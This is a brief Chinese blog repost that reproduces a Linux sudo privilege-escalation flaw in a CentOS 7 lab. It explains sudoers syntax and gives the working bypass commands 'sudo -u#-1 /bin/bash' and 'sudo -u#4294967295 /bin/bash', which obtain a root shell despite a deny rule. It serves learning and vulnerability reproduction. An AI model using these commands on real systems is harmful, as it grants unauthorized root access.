linux sudo漏洞复现

本文转载自查看原文 2019-10-15 18:49 344

复现此漏洞之前，先了解一下如何配置sudo权限。

在/etc/sudoers文件中配置sudo权限，配置命令为:

username ¹ ALL²=(ALL³) ALL⁴

1:需要添加权限的用户名

2：可以执行sudo命令的主机，这里为所有主机

3：执行sudo命令时以哪个用户的身份执行，这里为所有用户。可以用！来表示不能用的身份。

4：sudo 可以执行的名令，这里为所有命令。

环境：CentOS7

sudo版本：1.8.23

第一步：添加sudo权限，hello用户不能已root用户执行/bin/bash命令

第二步：切换到hello用户，已root用户执行/bin/bash命令，不成功

第三步：执行sudo -u#-1 /bin/base命令，成功执行。执行sudo -u#4294967295 /bin/bash同样能成功。

参考文章：

sudo命令与权限配置：https://blog.csdn.net/wanglei_storage/article/details/73065238
linux sudo漏洞复现：https://mp.weixin.qq.com/s/bb6Hd3JdYiLilqdP_-INtA https://mp.weixin.qq.com/s/bb6Hd3JdYiLilqdP_-INtA
linux sudo漏洞分析：https://www.freebuf.com/news/216821.html

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 Linux sudo权限提升漏洞（CVE-2021-3156）复现 [权限提升] CVE-2021-3156 Linux sudo 漏洞复现 Linux sudo(CVE-2019-14287)漏洞复现过程 Sudo提权漏洞复现【CVE-2021-3156】linux sudo提权漏洞复现及修复 [漏洞复现]CVE-2019-14287 sudo提权漏洞 sudo 提权漏洞（CVE-2019-14287）复现 CVE-2021-3156 sudo提权漏洞复现 Linux sudo权限提升漏洞整改方法 CVE-2021-3156：Sudo 堆缓冲区溢出漏洞复现过程